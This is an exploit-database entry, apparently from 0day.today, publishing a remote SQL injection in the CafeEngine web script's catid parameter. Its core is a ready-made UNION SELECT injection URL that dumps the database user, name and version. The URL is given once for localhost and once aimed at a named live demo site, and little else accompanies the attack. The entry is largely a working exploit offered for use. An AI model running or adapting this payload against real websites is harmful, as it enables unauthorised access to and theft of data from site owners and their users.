CafeEngine (index.php catid) Remote SQL Injection Vulnerability

2009-02-06T00:00:00
ID 1337DAY-ID-4811
Type zdt
Reporter SuNHouSe2
Modified 2009-02-06T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
CafeEngine (index.php catid) Remote SQL Injection Vulnerability
===============================================================


           
             /************************************************************************/
             /*                                                                      */
             /*                            CAFE ENGINE                               */
             /*                                                                      */
             /*                   Remote SQL Injection Vulnerability                 */
             /*                                                                      */
             /*                                                                      */
             /************************************************************************/
   
                                                                                 


 [~]AUTHOR          : SuNHouSe2 [ALGERIAN HaCkEr]

 [~]HOME            : http://www.snakespc.com                    

 [~]VERSION         : EASY CAFE ENGINE

 [~]BUY SCRIPT      : http://cafeengine.com/  >>> Price : 10$

 [~]EXPLOIT         : 

                     http://127.0.0.1/index.php?catid=4%20UNION%20ALL%20SELECT%201,2,3,Group_concat(user(),0x3a,database(),0x3a,version()),5,6,7,8,9,10--
                     
 [~]DEMO WEBSITE    :
                     http://easy.cafeengine.com/index.php?catid=4%20UNION%20ALL%20SELECT%201,2,3,Group_concat(user(),0x3a,database(),0x3a,version()),5,6,7,8,9,10--
                

 


#  0day.today [2018-01-02]  #